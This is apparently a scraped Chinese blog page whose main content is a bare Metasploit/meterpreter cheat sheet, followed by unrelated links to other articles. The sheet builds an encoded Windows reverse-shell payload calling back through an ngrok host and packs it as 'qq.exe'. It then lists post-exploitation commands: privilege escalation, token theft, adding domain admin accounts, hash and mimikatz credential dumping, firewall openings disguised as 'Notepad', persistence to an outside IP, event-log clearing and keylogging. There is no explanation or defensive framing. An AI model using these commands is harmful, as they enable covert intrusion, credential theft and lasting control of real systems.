meterpreter Command Sample

==================================================================================================
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i -b '\x00' LHOST=free.ngrok.cc LPORT= -f c msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i -b '\x00' LHOST=free.ngrok.cc LPORT= -f exe -o qq.exe
upx - qq.exe -k
==================================================================================================
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.195.45
set lport
set ExitOnSession false
set AutorunScript post/windows/manage/smart_migrate
exploit -j -z
jobs sessions -i
sysinfo
screenshot
getuid
getsystem
getuid
run post/windows/manage/priv_migrate
background ps
steal_token PID
drop_token
getuid use incognito
help incognito
list_tokens -u
list_tokens -g
impersonate_token DOMAIN_NAME\USERNAME
add_user domainuser password -h 192.168.195.191
add_group_user "Domain Admins" domainuser -h 192.168.195.191 run post/windows/gather/smart_hashdump
# http://www.objectif-securite.ch/en/ophcrack.php use mimikatz
help mimikatz
msv
ssp
kerberos
wdigest
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords run post/windows/gather/checkvm
run post/windows/gather/enum_applications
run post/windows/gather/dumplinks run post/windows/gather/usb_history
run post/windows/gather/enum_devices execute -f cmd.exe -i -H -t
net user username userpass /add
net localgroup "Administrators" username /add
net user domainuser userpass /add /DOMAIN
net group "Domain Admins" domainuser /add /DOMAIN
netsh firewall add portopening TCP "Notepad" ENABLE ALL
netsh firewall add portopening TCP "Notepad" ENABLE ALL
exit run metsvc
run persistence -X -i -p -r 47.90.92.56 run post/windows/manage/enable_rdp
run getgui -e
run getgui -u username -p userpass
# rdesktop -u username -p userpass server[:port] clearev
run post/windows/capture/keylog_recorder
==================================================================================================

meterpreter Command Sample的更多相关文章

  1. POJ-1028 Web Navigation 和TOJ 1196. Web Navigation

    Standard web browsers contain features to move backward and forward among the pages recently visited ...

  2. 北大poj- 1028

    Web Navigation Time Limit: 1000MS   Memory Limit: 10000K Total Submissions: 33281   Accepted: 14836 ...

  3. POJ 1028题目描述

    Description Standard web browsers contain features to move backward and forward among the pages rece ...

  4. hdu 1509 Windows Message Queue

    题目连接 http://acm.hdu.edu.cn/showproblem.php?pid=1509 Windows Message Queue Description Message queue ...

  5. 小学生玩ACM----优先队列

    思来想去,本人还是觉得,这个优先队列啊,不学不行,怎么说咧?虽说有时候我可以模仿它的功能,但是有的题目会坑的我大放血,况且多学会用一个小东东总不会伤身的撒,何况我是永举不垂的,哦耶,嘿嘿 优先队列嘛就 ...

  6. Web Navigation

    Description Standard web browsers contain features to move backward and forward among the pages rece ...

  7. hdoj 1509 Windows Message Queue【优先队列】

    Windows Message Queue Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Ot ...

  8. SOSEx ReadMe

    Quick Ref:--------------------------------------------------bhi [filename] BuildHeapIndex - Builds a ...

  9. POJ-1028(字符串模拟)

    Web Navigation Time Limit: 1000MS   Memory Limit: 10000K Total Submissions: 31906   Accepted: 14242 ...

随机推荐

  1. 1146. Topological Order (25)

    This is a problem given in the Graduate Entrance Exam in 2018: Which of the following is NOT a topol ...

  2. hdu 6050: Funny Function (2017 多校第二场 1006) 【找规律】

    题目链接 暴力打个表找下规律就好了,比赛时看出规律来了倒是,然而看这道题看得太晚了,而且高中的那些数列相关的技巧生疏了好多,然后推公式就比较慢..其实还是自身菜啊.. 公式是 #include< ...

  3. FastDFS整合nginx模块报错

    之前在本地虚拟机用的都是5.1的版本和1.12的nginx,在服务器上尝试一下高版本的6.1 一直报错各种,例如: undeclared (first use in this function) 尝试 ...

  4. 170819-关于EL表达式的知识点

    1 .EL表达式 [1] 简介 > JSP表达式 <%= %> 用于向页面中输出一个对象. > 到JSP2.0时,在我们的页面中不允许出现 JSP表达式和 脚本片段. > ...

  5. OSI参考模型和网络排错

     OSI七层协议 应用层  应用程序通信服务 表示层  显示  加密  数据格式 会话层   服务器和客户机建立会话  netstat -nb 查看会话   mscofig 传输层 可靠回话传输 分段 ...

  6. Vue子组件传递数据给父组件

    子组件通过this.$emit(event,data)传递数据到父组件 以下是例子: father.vue 父组件 <template> <div> <child @ne ...

  7. java微信扫码支付Native(模式二)

    官方开发文档模式二的地址:https://pay.weixin.qq.com/wiki/doc/api/native.php?chapter=6_5 pom文件的依赖: <?xml versio ...

  8. nginx用途

     Nginx常用来做静态内容服务器和代理服务器,用来放置静态资源或者转发请求给后面的应用服务. 1. Nginx作为静态服务器使用 作为一个Web服务器,其最主要的任务是作为静态服务器使用. 你需要将 ...

  9. Red Hat Linux下安装JDK

    1. 下载Linux平台的JDK 下载对应操作系统的jdk,操作系统是32位的就下32位的jdk,64位的就下64位的jdk.下错了装不上的. 下载地址:http://www.Oracle.com/t ...

  10. RESTful_URI资源

    目录 目录 RESTful的资源 URI 标识资源 URL 定位资源 URI与URL的区别 为什么使用资源的概念 对资源的操作 URI的设计 RESTful的资源 在RESTful基础知识篇中,介绍了 ...